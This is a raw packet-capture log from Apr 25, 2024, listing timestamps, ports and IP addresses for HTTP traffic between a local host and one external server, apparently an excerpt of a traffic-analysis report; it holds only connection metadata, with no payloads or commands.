Apr 25, 2024 09:04:02.274069071 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.274084091 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.274104118 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.274107933 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.274107933 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.274116993 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.274127960 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.274158001 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.274223089 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.274241924 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.274252892 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.274302959 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.274326086 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.274372101 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.274399996 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.274400949 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.274416924 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.274463892 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.274466991 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.274486065 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.274537086 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.274537086 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.274553061 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.274585962 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.274591923 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.274657965 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.274694920 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.274707079 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.274719000 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.274744034 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.274775028 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.274795055 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.274816036 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.274828911 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.274837971 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.274874926 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.274884939 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.274938107 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.274950027 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.274966955 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.275002956 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.275002956 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.275013924 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.275026083 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.275072098 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.275089979 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.275103092 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.275141001 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.275172949 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.275172949 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.275183916 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.275197029 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.275234938 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.275238037 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.275279045 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.275280952 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.275317907 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.275335073 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.275346994 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.275372028 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.275403023 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.275410891 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.275487900 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.275521040 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.275521040 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.275559902 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.275573015 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.275624990 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.275656939 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.275667906 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.275691032 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.275738955 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.275738955 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.275743008 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.275764942 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.275791883 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.275821924 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.275823116 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.275877953 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.275944948 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.275945902 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.276017904 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.276030064 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.276040077 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.276051998 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.276063919 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.276076078 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.276096106 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.276097059 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.276118994 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.276127100 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.276133060 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.276166916 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.276168108 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.276189089 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.276207924 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.276242971 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.276242971 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.276274920 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.276285887 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.276298046 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.276349068 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.276349068 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.276367903 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.276421070 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.276441097 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.276485920 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.276494980 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.276508093 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.276542902 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.276581049 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.276592970 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.276607037 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.276635885 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.276690960 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.276695967 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.276736975 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.276738882 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.276786089 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.276803017 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.276843071 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.276843071 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.276843071 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.276853085 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.276876926 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.276923895 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.277004957 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.277017117 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.277029037 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.277066946 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.277066946 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.277067900 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.277102947 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.277122021 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.277127981 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.277194977 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.277205944 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.277216911 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.277229071 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.277229071 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.277229071 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.277247906 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.277278900 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.277288914 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.277311087 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.277350903 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.277350903 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.277359962 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.277390957 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.277410984 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.277410984 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.277431965 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.277481079 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.277488947 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.277524948 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.277559996 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.277611017 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.277615070 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.277659893 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.277673006 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.277686119 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.277714014 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.277775049 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.277775049 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.277787924 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.277854919 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.277854919 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.277857065 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.277868986 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.277880907 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.277930975 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.277930975 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.277935028 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.277976990 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.277995110 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.278013945 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.278032064 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.278053999 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.278068066 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.278100014 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.278117895 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.278167009 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.278187037 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.278218031 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.278222084 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.278261900 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.278305054 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.278305054 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.278325081 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.278362036 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.278383017 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.278394938 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.278405905 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.278425932 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.278470993 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.278481007 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.278542995 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.278578043 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.278578997 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.278599977 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.278633118 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.278645039 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.278676033 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.278686047 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.278707981 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.278737068 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.278754950 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.278804064 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.278804064 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.278836966 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.278847933 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.278860092 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.278870106 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.278882027 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.278922081 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.278922081 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.278922081 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.278944969 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.278958082 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.279000044 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.279005051 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.279036999 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.279063940 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.279112101 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.279118061 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.279144049 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.279150009 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.279185057 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.279200077 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.279258966 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.279258966 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.279273033 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.279330969 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.279382944 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.279396057 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.279417038 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.279417038 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.279431105 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.279462099 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.279462099 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.279472113 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.279493093 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.279510975 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.279510975 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.279542923 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.279551029 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.279561996 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.279577017 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.279609919 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.279609919 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.279618025 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.279666901 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.279675007 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.279755116 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.279778004 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.279784918 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.279789925 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.279800892 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.279812098 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.279841900 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.279841900 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.279860973 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.279864073 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.279920101 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.279926062 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.279932976 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.279944897 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.279962063 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.279967070 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.279988050 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.280000925 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.280000925 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.280030966 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.280031919 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.280078888 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.280097961 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.280121088 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.280133009 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.280155897 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.280155897 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.280174971 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.280189991 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.280249119 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.280260086 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.280277014 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.280282021 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.280311108 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.280311108 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.280342102 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.280380011 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.280385971 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.280432940 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.280432940 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.280464888 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.280498981 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.280540943 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.280553102 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.280559063 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.280559063 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.280575037 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.280576944 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.280627966 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.280627966 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.280647039 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.280658960 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.280679941 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.280721903 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.280754089 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.280754089 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.280766964 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.280781031 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.280807972 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.280857086 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.280857086 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.280905962 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.280961990 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.280972958 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.280982971 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.281022072 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.281022072 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.281040907 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.281095028 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.281109095 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.281167984 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.281169891 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.281209946 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.281227112 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.281246901 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.281275988 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.281301022 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.281312943 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.281325102 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.281346083 CEST	49733	80	192.168.2.4	176.97.76.106
